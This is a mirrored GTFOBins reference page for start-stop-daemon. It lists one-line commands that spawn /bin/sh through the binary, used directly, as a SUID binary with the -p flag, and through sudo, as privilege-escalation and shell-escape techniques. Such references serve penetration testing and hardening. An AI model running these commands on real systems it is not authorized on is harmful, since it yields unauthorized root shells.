1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-05-22 23:36:03 +02:00
GTFOBins.github.io/_gtfobins/start-stop-daemon.md
2018-11-05 16:41:04 +01:00

222 B

functions
shell suid sudo
code
start-stop-daemon -n $RANDOM -S -x /bin/sh
code
./start-stop-daemon -n $RANDOM -S -x /bin/sh -- -p
code
sudo start-stop-daemon -n $RANDOM -S -x /bin/sh